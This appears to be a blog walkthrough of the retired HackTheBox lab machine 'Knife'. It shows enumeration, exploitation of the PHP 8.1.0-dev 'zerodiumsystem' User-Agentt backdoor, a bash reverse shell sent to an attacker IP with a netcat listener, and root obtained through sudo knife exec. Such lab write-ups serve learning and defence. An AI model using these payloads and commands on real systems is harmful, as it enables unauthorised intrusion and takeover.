HackTheBox - Knife
| OS | Difficulty | IP Address | Status |
|---|---|---|---|
| Linux | Easy | 10.10.10.242 | Retired |
This was classified as an easy difficulty machine by MrKN16H7 on HackTheBox that has a webpage on port 80, running a developmental version of PHP which is vulnerable to remote code execution. We will analyze the vulnerability and then use a script by Richard Jones on PacketStorm to gain our foothold on the box. And finally, our privilege escalation vector will be a binary named knife which is a command line tool to manage the infrastructure automation tool called Chef.
Phase 1 - Enumeration
Nmap
As usual, we start off with a Nmap, to know which ports are opened.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We only see two ports opened: (i) SSH (ii) Apache httpd
Port 80
When we open the webpage, looks like nothing but a static webpage:
But when we look at the webpage through the DevTools, we see the version of PHP it is running:
Phase 2 - Exploitation
PHP-8.1.0-dev Backdoor (RCE)
A quick search on PHP-8.1.0-dev reveals right away an unauthenticated remote code execution vulnerability. Details and usage can be found here. We also find two proof-of-concept scripts; one by flast101 on ExploitDB and the other by Mayank Deshmukh on PacketStorm
Analyzing the Exploit
Looking at the exploit script, the vulnerability is simple and straight forward:
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
As seen in the above snippet from the exploit script, the backdoor lies in the User-Agent header. If we add an extra “t” to “User-Agent” and type “zerodiumsystem” as the User-Agent value; within it’s parameters we can execute commands:
So, we can add a Bash reverse shell, listen on the specified port and get the shell as james; or even simpler, we can just run the script by PacketStorm.
┌──(kali㉿kali)-[~/CTF/HTB/machines/knife]
└─$ python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.8/9000 0>&1'"
┌──(kali㉿kali)-[~/CTF/HTB/machines/knife]
└─$ nc -lnvp 9000
listening on [any] 9000 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.242] 55806
bash: cannot set terminal process group (933): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
And we are in as james!
Phase 3 - Privilege Escalation
Knife from Chef
Chef is an automation/infrastructure platform:
Chef Infra is a powerful automation platform that transforms infrastructure into code. Whether you’re operating in the cloud, on-premises, or in a hybrid environment, Chef Infra automates how infrastructure is configured, deployed, and managed across your network, no matter its size.
And knife is a command line tool to manage Chef.
Listing the permission our user james has to run commands as root, we find one:
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
So, we can run knife as root. We take a quick look at GTFObins and find a page for knife, and all we need to do is run knife with the exec command which will run Ruby code to execute other commands, and in our case; Bash.
james@knife:~$ sudo knife exec -E "exec '/bin/bash'"
root@knife:/home/james#
And we are root!
Post a Comment